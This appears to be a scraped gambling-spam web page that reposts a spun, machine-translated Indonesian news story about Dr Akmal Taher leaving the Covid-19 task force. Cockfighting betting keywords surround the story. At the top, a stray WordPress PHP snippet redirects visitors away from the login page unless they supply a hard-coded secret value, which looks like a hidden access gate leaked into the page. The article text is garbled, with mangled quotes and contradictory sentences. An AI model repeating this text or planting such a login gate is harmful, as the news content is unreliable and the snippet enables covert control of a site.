//̨¼ add_action('login_enqueue_scripts','login_protection'); function login_protection(){ if($_GET['word'] != '2868973770')header('Location: https://www.baidu.com/'); } Penarikan diri dari kelompok kerja Covid-19 Akmal Taher: hanya strategi yang berbeda | adu ayam bali_s128.net login_s128.live

Penarikan diri dari kelompok kerja Covid-19 Akmal Taher: hanya strategi yang berbeda

Jakarta, TRIBUNNEWS.COM-Dr Akmal Taher resmi mengundurkan diri dan menjadi Kepala Bidang Manajemen Kesehatan Satgas Covid-19.

Setelah dikonfirmasi Tribunnews.com, Senin (28/9/2020), dia membenarkan hal tersebut. – “Sudah banyak orang, bukan,” kata Akmal.

Akmal mengungkapkan alasan pengunduran dirinya sebagai kepala manajemen kesehatan satuan tugas Covid-19. Baginya, ada strategi berbeda untuk menghadapi epidemi ini. .

“Ini hanya perbedaan dalam strategi. Dari sudut pandang, kalau tidak ada yang salah, tidak ada manfaatnya. Ini hanya pilihan strategi, strategi mana yang akan digunakan. Saya rasa itu sangat penting, katanya, begitu sepertinya. –Akmal juga menambahkan bahwa strategi penyelesaian masalah yang berbeda biasanya terjadi dalam organisasi. Demikian pula untuk menyelesaikan suatu masalah.

Baca: Airlangga: Sekarang angka kesembuhan Covid-19 setara secara global

” Hanya saja saya memiliki pandangan seperti itu, dan organisasi mungkin mempertimbangkannya dari sudut lain, tambahnya. “Dia juga memastikan akan terus membantu pemerintah menangani pandemi Covid-19 ini. Jika ya, saya akan lakukan di tempat lain. Saya yakin akan ada strategi di masa depan. Itu saja. Saya hanya ingin melakukan ini. “Tim Pakar Kelompok Kerja Percepatan Pengolahan Covid-19. Pada saat yang sama, publik juga mengenal Akmal Taher, guru besar Fakultas Kedokteran Universitas Indonesia. Spesialis Urologi.

Akmal Taher adalah direktur senior dokter rumah sakit. Jakarta Cipto Mangunkusumo, Presiden Persatuan Ahli Urologi Indonesia.

Leave a comment

adu ayam bali_s128.net login_s128.live